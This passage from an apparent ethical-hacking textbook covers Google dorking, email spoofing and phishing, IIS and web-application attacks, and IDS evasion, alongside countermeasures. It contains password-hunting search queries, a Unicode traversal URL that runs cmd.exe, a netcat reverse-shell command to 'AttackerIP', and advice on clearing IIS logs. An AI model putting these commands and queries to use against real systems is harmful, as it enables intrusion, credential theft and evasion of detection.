operators, which we‘ll discuss in a moment. There is a fairly effective way to get more

than 10 search terms crammed into a query: Replace Google‘s ignored terms with the

wildcard character (*). Google does not count the wildcard character as a search term,

allowing you to extend your searches quite a bit.

Basic Searching

Google searching is a process, the goal of which is to find information about a topic. The process

begins with a basic search, which is modified in a variety of ways until only the pages of relevant

information are returned. Google‘s ranking technology helps this process along by placing the

highest-ranking pages on the first results page. The details of this ranking system are complex and

somewhat speculative, but suffice it to say that for our purposes Google rarely gives us exactly

what we need following a single search.

Using Boolean Operators and Special Characters

More advanced than basic word searches, phrase searches are still a basic form of a Google query.

To perform advanced queries, it is necessary to understand the Boolean operators AND, OR, and

NOT. To properly segment the various parts of an advanced Google query, we must also explore

visual grouping techniques that use the parenthesis characters. Finally, we will combine these

techniques with certain special characters that may serve as shorthand for certain operators,

wildcard characters, or placeholders. Boolean operators help specify the results that are

returned from a query. If you are already familiar with Boolean operators, take a moment to skim

this section to help you understand Google‘s particular implementation of these operators, since

many search engines handle them in different ways. Improper use of these operators could

drastically alter the results that are returned.

The most commonly used Boolean operator is AND. This operator is used to include multiple

terms in a query. For example, a simple query like hacker could be expanded with a Boolean

operator by querying for hacker AND cracker. The latter query would include not only pages that

talk about hackers but also sites that talk about hackers and the snacks they might eat. Some search

engines require the use of this operator, but Google does not. The term AND is redundant to

Google. By default, Google automatically searches for all the terms you include in your query.

The plus symbol (+) forces the inclusion of the word that follows it. There should be no space

following the plus symbol.

Another common Boolean operator is NOT. Functionally the opposite of the AND operator, the

NOT operator excludes a word from a search. One way to use this operator is to preface a search

word with the minus sign (–). Be sure to leave no space between the minus sign and the search

term. Consider a simple query such as hacker. This query is very generic and will return hits for all

sorts of occupations, like golfers, woodchoppers, serial killers, and those with chronic bronchitis.

With this type of query, you are most likely not interested in each and every form of the word

hacker but rather a more specific rendition of the term. To narrow the search, you could include

more terms, which Google would automatically AND together, or you could start narrowing the

search by using NOT to remove certain terms from your search.

Google Advanced Operators:

Introduction

Beyond the basic searching techniques explored in the previous chapter, Google offers special

terms known as advanced operators to help you perform more advanced queries.These operators,

when used properly, can help you get to exactly the information you‘re looking for without

spending too much time poring over page after page of search results. When advanced operators

are not provided in a query, Google will locate your search terms in any area of the Web page,

including the title, the text, the URL, or the like.We take a look at the following advanced operators

in this chapter:

(a) intitle, allintitle

(b) inurl, allinurl

(c) filetype

(d) allintext

(e) site

(f) link

(g) inanchor

(h) daterange

(i) cache

(j) info

(k) related

(l) phonebook

(m) rphonebook

(n) bphonebook

(o) author

(p) group

(q) msgid

(r) insubject

(s) stocks

(t) define

Operator Syntax

An advanced operator is nothing more than a part of a query. You provide advanced operators to

Google just as you would any other query. In contrast to the somewhat free-form style of standard

Google queries, however, advanced operators have a fairly rigid syntax that must be followed. The

basic syntax of a Google advanced operator is operator:search_term. When using advanced

operators, keep in mind the following:

There is no space between the operator, the colon, and the search term. Violating this

syntax can produce undesired results and will keep Google from understanding the

advanced operator. In most cases, Google will treat a syntactically bad advanced operator

as just another search term.

For example, providing the advanced operator intitle without a following colon and

search term will cause Google to return pages that contain the word intitle.

The search term is the same syntax as search terms we covered in the previous chapter.

For example, you can provide as a search term a single word or a phrase surrounded

by quotes. If you provide a phrase as the search term, make sure there are no spaces

between the operator, the colon, and the first quote of the phrase.

Boolean operators and special characters (such as OR and +) can still be applied to

advanced operator queries, but be sure not to place them in the way of the separating colon.

Advanced operators can be combined in a single query as long as you honor both the basic

Google query syntax as well as the advanced operator syntax. Some advanced operators

combine better than others, and some simply cannot be combined.

The ALL operators (the operators beginning with the word ALL) are oddballs. They are

generally used once per query and cannot be mixed with other operators.

Google‘s Advanced Operators

Intitle and Allintitle: Search Within the Title of a Page

Allintext: Locate a String Within the Text of a Page

Inurl and Allinurl: Finding Text in a URL

Site: Narrow Search to Specific Sites

Filetype: Search for Files of a Specific Type

Link: Search for Links to a Page

Inanchor: Locate Text Within Link Text

Cache: Show the Cached Version of a Page

Numrange: Search for a Number

Daterange: Search for Pages Published Within a Certain Date Range

Info: Show Google‘s Summary Information

Related: Show Related Sites

Author: Search Groups for an Author of a Newsgroup Post

Group: Search Group Titles

Insubject: Search Google Groups Subject Lines

Msgid: Locate a Group Post by Message ID

Stocks: Search for Stock Information

Define: Show the Definition of a term

Phonebook: Search Phone Listings

Google Hacking Basics:

Anonymity with Caches

Google‘s cache feature is truly an amazing thing. The simple fact is that if Google crawls a page or

document, you can almost always count on getting a copy of it, even if the original source has since

dried up and blown away. Of course the down side of this is that hackers can get a copy of your

sensitive data even if you‘ve pulled the plug on that pesky Web server. Another down side of the

cache is that the bad guys can crawl your entire Web site (including the areas you ―forgot‖ about)

without even sending a single packet to your server. If your Web server doesn‘t get so much as a

packet, it can‘t write anything to the log files. If there‘s nothing in the log files, you might not have

any idea that your sensitive data has been carried away. It‘s sad that we even have to think in these

terms, but untold megabytes, gigabytes, and even terabytes of sensitive data leak from Web servers

every day. Understanding how hackers can mount an anonymous attack on your sensitive data via

Google‘s cache is of utmost importance. Google grabs a copy of most Web data that it crawls.

There are exceptions, and this behavior is preventable.

Google as a Proxy Server

Although this technique might not work forever, at the time of this writing it‘s possible to use

Google itself as a proxy server. This technique requires a Google translated URL and some

minor URL modification. To make this work, we first need to generate a translation URL. The

easiest way to do this is through Google‘s translation service, located at

www.google.com/translate_t. If you were to enter a URL into the ―Translate a web page‖ field,

select a language pair, and click the Translate button, Google would translate the contents of the

Web page and generate a translation URL that could be used for later reference. Langpair

parameter, which is only available for the translation service, describes which languages to

translate to and from, respectively. The arguments to this parameter are identical to the hl

parameters. What would happen if we were to translate a page from one language into the same

language? This would change our translation URL to:

http://www.google.com/translate?u=http%3A%2F%2Fwww.google.com&langpair=en%7Ce

n&hl=en&ie=Unknown&oe=ASCII

If we loaded this URL into our browser, and if the source page were in English to begin with, we

would see a page. First, you should notice that the Google search page in the bottom frame of the

browser window looks pretty familiar. In fact, it looks identical to the original search page. This is

because no real language translation occurred. The top frame of the browser window shows the

standard translation banner. Admittedly, all this work seems a bit anticlimactic, since all we have to

show for our efforts is an exact copy of a page we could have just loaded directly. Fortunately,

there is a payoff when we consider what happens behind the scenes. Let‘s look at another example,

this time translating the www.phrack.org/hardcover62/ Web page, monitoring network traffic

with tcpdump -n -U -t. This is not a perfect proxy solution and should not be used as the sole

proxy server in your toolkit. We present it simply as a example of what a little creative thinking

can accomplish. While Google is acting as a proxy server, it is a transparentproxy server, which

means the target Web site can still see our IP address in the connection logs, despite the fact that

Google grabbed the page for us.

Directory Listings

A directory listing is a type of Web page that lists files and directories that exist on a Web server.

Designed to be navigated by clicking directory links, directory listings typically have a title that

describes the current directory, a list of files and directories that can be clicked, and often a footer

that marks the bottom of the directory listing. Much like an FTP server, directory listings offer a

no-frills, easy-install solution for granting access to files that can be stored in categorized folders.

Unfortunately, directory listings have many faults, specifically:

They are not secure in and of themselves. They do not prevent users from downloading

certain files or accessing certain directories. This task is often left to the protection

measures built into the Web server software or third-party scripts, modules, or programs

designed specifically for that purpose.

They can display information that helps an attacker learn specific technical details about

the Web server.

They do not discriminate between files that are meant to be public and those that are

meant to remain behind the scenes.

They are often displayed accidentally, since many Web servers display a directory listing

if a top-level index file (index.htm, index.html, default.asp, and so on) is missing or

invalid.

All this adds up to a deadly combination.

Locating Directory Listings

The most obvious way an attacker can abuse a directory listing is by simply finding it! Since

directory listings offer ―parent directory‖ links and allow browsing through files and folders, even

the most basic attacker might soon discover that sensitive data can be found by simply locating the

listings and

Browsing through them. Locating directory listings with Google is fairly straightforward. An

obvious query to find page might be intitle:index.of, which could find pages with the term index of

in the title of the document. Remember that the period (―.‖) serves as a single-character wildcard in

Google. Unfortunately, this query will return a large number of false positives such as pages with

the following titles:

Index of Native American Resources on the Internet

LibDex - Worldwide index of library catalogues

Iowa State Entomology Index of Internet Resources

Judging from the titles of these documents, it is obvious that not only are these Web pages

intentional, they are also not the type of directory listings we are looking for.

Finding Specific Directories

In some cases, it might be beneficial not only to look for directory listings but to look for directory

listings that allow access to a specific directory. This is easily accomplished by adding the name of

the directory to the search query. To locate ―admin‖ directories that are accessible from directory

listings, queries such as intitle:index.of.admin or intitle:index.of inurl:admin will work well.

Finding Specific Files

Because of the directory tree style, it is also possible to find specific files in a directory listing. For

example, to find WS_FTP log files, try a search such as

intitle:index.of ws_ftp.log.This technique can be extended to just about any kind of file by keying

in on the index.of in the title and the filename in the text of the Web page. You can also use

filetype and inurl to search for specific files. To search again for ws_ftp.log files, try a query like

filetype:log inurl:ws_ftp.log. This technique will generally find more results than the somewhat

restrictive index.of search.

Server Versioning

One piece of information an attacker can use to determine the best method for attacking a Web

server is the exact software version. An attacker could retrieve that information by connecting

directly to the Web port of that server and issuing a request for the HTTP (Web) headers. It

is possible, however, to retrieve similar information from Google without ever connecting to the

target server. One method involves using the information provided in a directory listing. Notice

that some directory listings provide the name of the server software as well as the version

number. An adept Web administrator could fake these server tags, but most often this information

is legitimate and exactly the type of information an attacker will use to refine his attack against the

server. The Google query used to locate servers this way is simply an extension of the

intitle:index.of query. intitle:index.of “ server at” query will locate all directory listings on the

Web with index of in the title and server at anywhere in the text of the page. This might not seem

like a very specific search, but the results are very clean and do not require further refinement. To

search for a specific server version, the intitle:index.of query can be extended even further to

something like intitle:index.of “Apache/1.3.27 Server at”. In addition to identifying the Web

server version, it is also possible to determine the operating system of the server (as well as

modules and other software that is installed).

Traversal Techniques

Attackers use traversal techniques to expand a small foothold into a larger compromise.The query

intitle:index.of inurl:“/admin/*” is helped to traversal.

Site Operator

The site operator is absolutely invaluable during the information-gathering phase of an assessment.

Site search can be used to gather information about the servers and hosts that a target hosts. Using

simple reduction techniques, you can quickly get an idea about a target‘s online presence. Consider

the simple example of site:washingtonpost.com –site:www.washingtonpost.com. This query

effectively locates pages on the washingtonpost.com domain other than www.washingtonpost.com

login | logon

Login portals can reveal the software and operating system of a target, and in many cases ―self-

help‖ documentation is linked from the main page of a login portal. These documents are designed

to assist users who run into problems during the login process. Whether the user has forgotten his

or her password or even username,this document can provide clues that might help an attacker.

Documentation linked from login portals lists e-mail addresses, phone numbers, or URLs of human

assistants who can help a troubled user regain lost access.

admin | administrator

The word administrator is often used to describe the person in control of a network or system. The

word administrator can also be used to locate administrative login pages, or login portals. The

phrase Contact your system administrator is a fairly common phrase on the Web, as are several

basic derivations. A query such as ―please contact your * administrator‖ will return results that

reference local, company, site, department, server, system, network, database,e-mail, and even

tennis administrators. If a Web user is said to contact an administrator, chances are that the data has

at least moderate importance to a security tester.

Searching for Passwords

Password data, one of the ―Holy Grails‖ during a penetration test, should be protected.

Unfortunately, many examples of Google queries can be used to locate passwords on the Web.

Google Hacking Database

The Google Hacking Database (GHDB) contains queries that identify sensitive data such as portal

logon pages, logs with network security information, and so on. Visit http://johnny.ihackstuff.com

Windows Registry Entries Can RevealPasswords

Query like filetype:reg intext: “internet account manager” could reveal interesting keys containing

password data.

6. EMAIL ATTACKS

Working of Emails:

Email sending and receiving is controlled by the Email servers. All Email service providers

configure Email Server before anyone can Sign into his or her account and start communicating

digitally. Once the servers are ready to go, users from across the world register in to these Email

servers and setup an Email account. When they have a fully working Email account, they sign into

their accounts and start connecting to other users using the Email services.

Email Travelling Path:

Let‘s say we have two Email providers, one is Server1.com and other is Server2.in, ABC is a

registered user in Server1.com and XYZ is a registered user in server2.in. ABC signs in to his

Email account in Server1.com, he then writes a mail to the xyz@server2.in and click on Send and

gets the message that the Email is sent successfully. But what happens behind the curtains, the

Email from the computer of abc@server1.com is forwarded to the Email server of Server1.com.

Server1 then looks for server2.in on the internet and forwards the Email of the server2.in for the

account of XYZ. Server2.in receives the Email from server1.com and puts it in the account of

XYZ. XYZ then sits on computer and signs in to her Email account. Now she has the message in

her Email inbox.

www.syngress. www.syngress.

SERVER1.com

SERVER2.in

ISP

abc@sever1.com xyz@sever2.in

EMAIL

Email Service Protocols:

SMTP

SMTP stands for Simple Mail Transfer Protocol. SMTP is used when Email is

delivered from an Email client, such as Outlook Express, to an Email server or when

Email is delivered from one Email server to another. SMTP uses port 25.

POP3

POP3 stands for Post Office Protocol. POP3 allows an Email client to download an

Email from an Email server. The POP3 protocol is simple and does not offer many

features except for download. Its design assumes that the Email client downloads all

available Email from the server, deletes them from the server and then disconnects. POP3

normally uses port 110.

IMAP

IMAP stands for Internet Message Access Protocol. IMAP shares many similar

features with POP3. It, too, is a protocol that an Email client can use to download Email

from an Email server. However, IMAP includes many more features than POP3. The

IMAP protocol is designed to let users keep their Email on the server. IMAP requires

more disk space on the server and more CPU resources than POP3, as all Emails are

stored on the server. IMAP normally uses port 143.

Email Server Configuration:

Email server software like Postcast Server, Hmailserver, SurgEmail, etc can be used to convert

your Desktop PC into an Email sending server. HMailServer is an Email server for Microsoft

Windows. It allows you to handle all your Email yourself without having to rely on an Internet

service provider (ISP) to manage it. Compared to letting your ISP host your Email, HMailServer

adds flexibility and security and gives you the full control over spam protection.

Email Security:

Now let‘s check how secure this fast mean of communication is. There are so many attacks which

are applied on Emails. There are people who are the masters of these Email attacks and they always

look for the innocent people who are not aware of these Email tricks and ready to get caught their

trap. You have to make sure that you are not an easy target for those people. You have to secure

your mail identity and profile, make yourself a tough target. If you have an Email Id Do not feel

that it does not matters if gets hacked because there is no important information in that Email

account, because you do not know if someone gets your

Email id password and uses your Email to send a threatening Email to the Ministry or to the News

Channels. Attacker is not bothered about your data in the Email. He just wants an Email ID Victim

which will be used in the attack. There are a lots of ways by which one can use your Email in

wrong means, i am sure that you would have come across some of the cased where a student gets

an Email from his friends

Abusing him or cases on Porn Emails where the owner of the Email does not anything about the

sent Email.

Email Spoofing:

Email spoofing is the forgery of an Email header so that the message appears to have originated

from someone or somewhere other than the actual source. Distributors of spam often use spoofing

in an attempt to get recipients to open, and

possibly even respond to, their solicitations. Spoofing can be used legitimately. There are so many

ways to send the Fake Emails even without knowing the password of the Email ID. The Internet is

so vulnerable that you can use anybody's Email ID to send a threatening Email to any official

personnel.

Fake Email- Open Relay Server:

An Open Mail Relay is an SMTP (Simple Mail Transfer Protocol) server configured in such a way

that it allows anyone on the Internet to send Email through it, not just mail destined ‗To‘ or

‗Originating‘ from known users. An Attacker can connect the Open Relay Server via Telnet and

instruct the server to send the Email. Open Relay Email Server requires no password to send the

Email.

Fake Email- Web Script:

Web Programming languages such as PHP and ASP contain the mail sending functions which can

be used to send Emails by programming Fake headers i.e.‖ From: To: Subject:‖ There are so many

websites available on the Internet which Already contains these mail sending scripts. Most of them

provide the free service. Some of Free Anonymous Email Websites are:

Mail.Anonymizer.name (Send attachments as well)

FakEmailer.net

FakEmailer.info

Deadfake.com

Fake Email- Consequences:

Email from your Email ID to any Security Agency declaring a Bomb Blast can make you

spend rest of your life behind the iron bars.

Email from you to your Girl friend or Boy friend can cause Break-Up and set your

friend‘s to be in relationship.

Email from your Email ID to your Boss carrying your Resignation Letter or anything else

which you can think of.

There can be so many cases drafted on Fake Emails.

Fake Email- Proving:

Every Email carry Header which has information about the Travelling Path of the Email.

Check the Header and Get the location from the Email was Sent.

Check if the Email was sent from any other Email Server or Website.

Headers carry the name of the Website on which the mail sending script was used.

Email Bombing:

Email Bombing is sending an Email message to a particular address at a specific victim site. In

many instances, the messages will be large and constructed from meaningless data in an effort to

consume additional system and network resources. Multiple accounts at the target site may be

abused, increasing the denial of service impact.

Email Spamming:

Email Spamming is a variant of Bombing; it refers to sending Email to hundreds or thousands of

users (or to lists that expand to that many users). Email spamming can be made worse if recipients

reply to the Email, causing all the original addressees

to receive the reply. It may also occur innocently, as a result of sending a message to mailing lists

and not realizing that the list explodes to thousands of users, or as a result of a responder message

(such as vacation(1)) that is setup incorrectly.

Email Password Hacking:

There is no specified attack available just to hack the password of Email accounts. Also, it is not so

easy to compromise the Email server like Yahoo, Gmail, etc. Email Password Hacking can be

accomplished via some of the Client Side Attacks. We try to compromise the user and get the

password of the Email account before it reaches the desired Email server.

Phishing Attack

The act of sending an Email to a user falsely claiming to be an established legitimate enterprise in

an attempt to scam the use into surrendering private information that will be used for identity theft.

The Email directs the user to visit a Web site where they are asked to update personal information,

such as passwords and credit card, social security, and bank account numbers, that the legitimate

organization already has. The Web site, however, is Bogus and set up only to steal the User‘s

information.

Phishing Scams could be

Emails inviting you to Join a Social Group, asking you to Login using your Username

and Password.

Email saying that Your Bank Account is locked and Sign in to your Account to Unlock

IT.

Emails containing some Information of your Interest and asking you to Login to Your

Account.

Any Email carrying a Link to Click and Asking you to Login

Prevention against Phishing

Read all the Email Carefully and Check if the Sender is Original.

Watch the Link Carefully before Clicking.

Always check the URL in the Browser before Signing IN to your Account.

Always Login to Your Accounts after opening the Trusted Websites, not by clicking in

any other Website or Email.

Email Tracing:

Tracing an Email means locating the Original Sender and Getting to know the IP address of the

network from which the Email was actually generated. To get the information about the sender of

the Email we first must know the structure of the Email. As we all know the travelling of the

Email. Each message has exactly one header, which is structured into fields. Each field has a name

and a value. Header of the Email contains all the valuable information about the path and the

original sender of the Email.

Check the headers in differ Email Service Providers.

Locating the Sender.

You can easily get the IP Address of the sender from the header and then can locate

the sender.

Once you have the IP Address of the sender, go to the URLwww.ip2location.com and

Find the location of the IP Address.

Securing Your Email Account:

Always configure a Secondary Email Address for the recovery Purpose.

Properly configure the Security Question and Answer in the Email Account.

Do Not Open Emails from strangers.

Do Not Use any other‘s computer to check your Email.

Take Care of the Phishing Links.

Do not reveal your Passwords to your Friends or Mates

7. WEBSITE ATTACKS

Hacking Web Servers

Web hacking is a critical topic because much of the Internet is devoted to e-commerce. This traffic

is typically allowed through a firewall or border router, so there is considerable risk involved.

Web Server Identification

While standard web servers run on ports 80 (HTTP) or 443 (HTTPS), there are other ports that

should be scanned for when looking for web-based applications. These include the following:

88 – Kerberos

2779 - Windows 2000 Web Server

8080 – Squid

8888 – Alternate Web Server

Some of the most popular tools used to scan for these services include: Nmap, Netscan

Tools and Superscan.

Web Server Enumeration

Once possible web servers have been identified, the attacker will usually attempt to enumerate the

web server vendor. The most popular web servers include: IIS Web Server, Apache Web Server

and Sun ONE Web Server. Common tools used to determine what the web server is running

include: Nmap, Telnet, and web sites such as Netcraft.

Vulnerability Identification

Once the attacker has identified the vendor and version of the web server, he will then search for

vulnerabilities. Some of the sites the attacker and security administrators would most likely visit to

identify possible vulnerabilities include:

http://www.packetstormsecurity.com

http://icat.nist.gov/icat.cfm

http://neworder.box.sk

The security administrator should also consider running an automated vulnerability scanning

software package. Several of these are worth mentioning: WebInspect, Whisker, N-Stealth

Scanner, Nessus and Shadow Security Scanner.

Vulnerability Exploitation

IIS may seem to be the target of many attacks, but this is partially due to the fact that it is so widely

used. Others such as Apache, have also been targeted for attack and have their share of

vulnerabilities. Attackers will take the least path of resistance. If this happens to be the web server,

expect it to be targeted. Some common exploits are discussed below.

ISAPI DLL Buffer Overflows

This exploit targets idq.dll. When executed, this attack can lead to a buffer overflow that can

compromise servers running IIS. What makes this vulnerability particular malicious is that the

service, part of IIS Indexing, does not even need to be running. Because the idq.dll runs as

system, the attacker can easily escalate his privilege and add himself to the administrator‘s group.

IPP Printer Overflow

This buffer overflow attack also targets the ISAPI filter (mws3ptr.dll) that handles printer files. If

the buffer is sent at least 420 characters, it will overflow and may potentially return a command

prompt to the attacker. There are several tools available to exploit this vulnerability; jill-win32

is an example of one.

ISAPI DLL Source Disclosure

Because of vulnerabilities in the ISM.dll, IIS4 and IIS5 can be made to disclose source data, rather

than executing it. An attacker accomplishes this by appending +.htr to the global .asa file.

IIS Directory Traversal

This vulnerability allows an attacker to back out of the current directory and go wherever he would

like within the logical drive‘s structure. Two iterations of this attack are:

Unicode

Double Decode

These attacks are possible because of the way in which the Unicode is parsed. These overly long

strings (as shown below) bypass the filters that are designed to only check short Unicode.

http://target//vulnerablefolder/..%c0%af..%c0%af..%c0%af..%c%af../winnt/system32/cmd.

exe?/c+dir+c:\

Directory Listing

The attacker can then place this Unicode string in the browser or script the attack with a tool such

as NetCat. If the attacker can access cmd.exe, he is only a few steps away from owning the box.

Back in 2001, the Nimda worm used this same vulnerability to ravage web servers.

Shoveling the Shell

For the final step, the attacker needs only to complete the following two steps. At that point, a

command shell will be returned to his computer with system privileges.

Execute nc.exe -l -p <Open Port> from the attacker‘s computer.

Execute nc.exe -v -e cmd.exe AttackerIP <Open Port> from the compromised server.

Escalating Privileges on IIS

Some well-known privilege escalation tools are: GetAdmin, HK, PipeupAdmin and IIScrack.dll

(httpodbc.dll). This completes the system hack, as the attacker now has administrator privileges on

the computer.

Clearing IIS Logs

Just as with any other attack, expect the attacker to attempt to remove or alter the log files located

at C:\Winnt\system32\Logfiles\W3SVC1, as they will most likely have a record of the attacker‘s

IP address.

File System Traversal Countermeasures

Countermeasures include:

Apply current patches

Move cmd.exe

Separate the OS and Applications by using two logical partitions

Remove executable permissions from the IUSR account

Securing IIS

As always, the best defense is a good offense. So, there is never going to be a better time than now

to make sure your web server is locked down. There are some good tools available for you to

accomplish this task.

UpdateExpert

Microsoft HotFix Checker

IIS Lockdown

Microsoft Baseline Security Analyzer

Calcs

Web Application Vulnerabilities

Footprinting

The methodology for assessing web applications is the same as all of the other services we have

examined. The attacker will attempt to gather as much information as possible about the site, as to

understand its function, design, and purpose. One good tool that can be used to gather information

is Instant Source.

Directory Structure

The most efficient way to determine the directory structure is with the use of a site ripping tool.

Site ripping tools allow the attacker to download the entire site locally. Once the site has been

duplicated, the attacker can start to examine the directory structure, make an analysis of the site

design, perform source sifting, and look for clues that can identify the type of underlying web

applications. Some excellent site ripping tools include: Wget, Black Widow and WebSleuth.

Documenting the Application Structure

Once the underlying applications have been uncovered, the attacker can then search the web to

look for vulnerabilities. If vulnerabilities are present, the attacker will also check the web

application vendors‘ web site. Many times, vendors are so proud of their products, they will list all

of their clients. This list of clients can be used to immediately target other vulnerable web sites.

Input Validation

Another huge problem with web applications is that of client-side data. Any time data is passed

from the client to the server, it must be checked. Without proper input validation, the web

application can be tricked into accepting invalid input.

Hidden Value Fields

Hidden value fields are embedded inside of the html code. The theory is that if end users cannot

see it, it is safe from tampering. The flaw in that logic is that anyone that views the page source

can see the hidden fields. Many sites use these hidden value fields to store the price of the product

that is passed to the web application. If the attacker saves the web page locally and then modifies

the amount, the new value will be passed to the web application. If no input validation is

performed, the application will accept the new, manipulated value.

Cross Site Scripting

Another popular web application hack is cross-site scripting. Web applications that use cookies

and fail to properly identify the user are potentially vulnerable. Sending the victim an e-mail with

a malicious link embedded is the way this attack is committed. Victims that fall for the ruse and

click on the link will have their credentials stolen. Sites running PHPnuke have been particularly

hard hit by this attack.

Cross-Site Scripting Countermeasures

This attack, like others, can be prevented. Consider the following:

Patch the program

Validate all input that your dynamic page receives

Be leery of embedded links

Disable scripting language support

Web Based Password Cracking Techniques

Authentication Types

Authentication types include:

Basic

Message Digest

Certificate

Microsoft Passport

Forms Based

You should be familiar with the details of each of these authentication types.

Web-based Password Cracking

There are an unlimited number of tools available to the attacker to attempt to break into web-based

applications. If the site does not employ a lockout policy, it is only a matter of time and bandwidth

before the attacker can gain entry. Some of these password cracking tools are: WebCracker,

Brutus, ObiWan, Munga, Bunga, Variant and PassList.

Stealing Cookies

If the attacker can gain physical access to the victim‘s computer, then there are various tools that

can be used to steal cookies or to view hidden passwords. These include the following:

CookieSpy and SnadBoy.

Buffer Overflows

Poorly written programs and the lack of boundary checking can cause buffer overflows. Anytime

bad data can be entered into an application that causes it to crash, blue screen, or drop to

root prompt, there‘s a problem! Buffer overflows can result in:

Attackers being able to run their code in privileged mode access

Freezing, rebooting, data corruption, or lockup of the attacked system

Exploitation

Many of today‘s most popular attacks are the result of buffer overflows. These include:

Jill-Win32 – IIS Buffer Overflow Attack

SQL2.exe – SQL Buffer Overflow Attack

WSFTP – DoS Buffer Overflow Attack

Named NXT – BIND Buffer Overflow Attack

While you may never write a buffer overflow program, you should be familiar with its structure.

Detecting Buffer Overflows

There are two primary ways to detect buffer overflows:

Proactive - Have an experienced programmer examine the code to verify it is written

correctly;

Reactive – Release a faulty program and wait until the attacker attacks the application by

feeding it long strings of data and observing its reaction.

Skills Required to Exploit Buffer Overflows

The skills required to exploit a buffer overflow include:

Knowledge of the Stack

Assembly Language

C Programming

The ability to guess key parameters

Defense Against Buffer Overflows

The best defense against buffer overflows is to start with a robust and secure program. Safer C

program calls should be used and the finished code should be audited. When dealing with pre-

compiled programs, you should always make sure the latest patches are applied and that the

program is executed at the least possible privilege.

Tools for Compiling Programs Robust Code

Some of the tools that are available to insure robust code include:

StackGuard

Immunix

IDS, Firewalls & Honeypots

Intrusion Detection Systems

IDS systems can be software or hardware based. While some are simple software applications,

others are high-end hardware based products. No matter what the platform, they share a common

purpose, which is to monitor events on hosts or networks and notify security administrators in

the event of an anomaly. IDS systems come in two basic types:

Anomaly Detection

Signature Recognition.

Anomaly Detection

This method of monitoring works by looking for traffic that is outside the bounds of normal

traffic. While this works well, it can be fooled by slowly changing traffic patterns. This can

sometimes fool the IDS into believing the illicit traffic is acceptable.

Signature Recognition

This method of monitoring works by comparing traffic to known attack signatures. It is as

effective as its most current update. It cannot detect an attack that is not in its database. While

signature and anomaly based IDS systems are the most commonly deployed types, other hybrid

IDS systems, such as honeypots, can be useful tools in detecting potential security breaches.

IDS Signature Matching

Signature matching works by capturing traffic and examining it to make sure that it complies with

known:

Protocol Stack Rules

Application Protocol Rules

IDS Software Vendors

There are many vendors for IDS systems. As a security administrator, your biggest concern should

be who will watch over and administrate the IDS. As once stated, ―IDS systems are like 3-year

old children as they require constant attention.‖ If you are not able to provide that amount of

attention and manpower, consider outsourcing the task to a qualified third party. Some well-known

IDS products include: SNORT, Cybercop, RealSecure and BlackIce.

Evading IDS

An attacker can use a host of programs to attempt to evade an IDS. He may even encrypt his data

to prevent an IDS from analyzing its content. Some of the tools an attacker may use to try and fool

an IDS include: Fragrouter, TCPReplay, SideStep, NIDSbench and ADMutate.

Hacking Through Firewalls

Firewalls function primarily by one of the three following methods:

Packet Filtering

NAT

Proxy

While it is not always possible to hack through firewalls, there are tools and techniques available to

determine their manufacturer, presence, and rule set. There are also ways to detect firewalls. As

an example, whenever you perform a traceroute and notice that the two final hops show the same

IP address, it‘s probable that you are dealing with a stateful inspection firewall. At this point, you

may want to try to connect. Many firewalls will divulge their presence by simply connecting to

them. Use tools such as Telnet and FTP to attempt a banner grab from the firewall. Tools such as

firewalk can be used to further enumerate the firewall‘s rule set. Firewalk works by tweaking

the IP TTL value, so that packets expire one hop beyond the gateway. Finally, Nmap is

another valuable tool that shouldn‘t be overlooked. It too, can be used to attempt enumeration of

the firewall. Nmap‘s reported results, be it open, closed, or filtered, can tell the attacker a lot

about the firewall‘s architecture. Filtered messages are commonly returned when Nmap receives

an ICMP type 3 Code 13 response. Reference RFC 792 to learn more about how ICMP functions.

http://www.faqs.org/rfcs/rfc792.html

Placing Backdoors Behind Firewalls

A much easier technique than hacking through the firewall, is to simply place a backdoor behind it.

Firewalls cannot deny what they must permit. There will usually be several ports open for the

skilled attacker to use. These include:

UDP 53 – DNS

TCP 25 - SMTP

TCP 80 – HTTP

ICMP 0/8 – Ping

Hiding Behind Covert Channels

Using one of these open ports is a good way for the attacker to covertly send data out of the

organization. Some of the tools commonly used here include:

NetCat – Can use any TCP/UDP open port

CryptCat – Same as NetCat, but carries the payload in an encrypted format

ACK CMD - Uses TCP ACK‘s as a covert channel

Loki – Uses ICMP as a covert channel. Looks like common ping traffic

Reverse WWW Shell – Uses HTTP as a covert channel

Honeypots

Honeypots are systems that contain phony files, services, and databases. They are deployed to

distract the attacker from the real target and give the administrator enough time to be alerted. For

these lures to be effective, they must adequately persuade the attacker that he has discovered a real

system. Products such as Network Associates‘ CyberCop Sting, simulate an entire network,

including routers and hosts that are actually all located on a single computer.

Honeypot Vendors

There are many honeypot vendors. The two most important issues with honeypots are entrapment

and enticement. Some honeypot vendors are listed below for your review. Each link offers good

information about this fascinating subject.

Deception Toolkit - http://www.all.net/dtk/index.html

HoneyD - http://www.citi.umich.edu/u/provos/honeyd/

LaBrea Tarpit - http://www.hackbusters.net

ManTrap - http://www.symantec.com

Single-Honeypot - http://www.sourceforge.net/projects/single-honeypot/

Smoke Detector - http://palisadesys.com/products/smokedetector/

Specter - http://www.specter.ch

Cryptography

PKI

Public key infrastructure provides a variety of valuable security services, such as key

management, authorization, and message integrity through the use of digital signatures. PKI

also extends a fourth basic feature to the security triad, that of non-repudiation:

Confidentiality

Integrity

Authentication

Non-repudiation

X.509 is one of the key standards that govern the use of PKI.

Digital Certificates

A digital certificate is a record used for authentication and encryption. It serves as a basic

component of PKI. RSA is the default encryption standard used with digital certificates and when

the certificate is requested from a CA (Certificate Authority), the request is comprised of the

following four fields:

The DN (Distinguished Name) of the CA

The Public key of the user

Algorithm identifier

The user‘s Digital signature

RSA is a public key cryptosystem in which one key is used for encryption (public key) and the

other is used for decryption (private key). RSA (Rivest Shamir Adleman) was developed in 1977

to help secure Internet transactions.

Hashing Algorithms

Hashing algorithms can be used for digital signatures or to verify the validity of a file. It is a one-

way process and is widely used.

MD5 – 128 bit message digest

SHA - 160 bit message digest

SSL

Netscape developed SSL (Secure Sockets Layer) and almost all browsers and web servers support

it. SSL‘s focus is on securing web transactions. The client is responsible for creating the session

key after the server‘s identity has been verified. SSL is limited in strength by the cryptographic

tools on which it is based.

PGP

PGP (Pretty Good Privacy) is a public encryption package that allows individuals to encrypt e-

mail and other personal data.

SSH

SSH (Secure Shell) is an excellent replacement for Telnet and FTP. It operates on port 22 and is

available in two versions: SSH and SSH2.

Session Hijacking

Spoofing Vs Hijacking

Spoofing is the act of masquerading as another user, whereas session hijacking attempts to

attack and take over an existing connection. The attacker will typically intercept the established

connection between the authorized user and service. The attacker will then take over the session

and assume the identity of the authorized user. Session hijacking attacks can range from basic

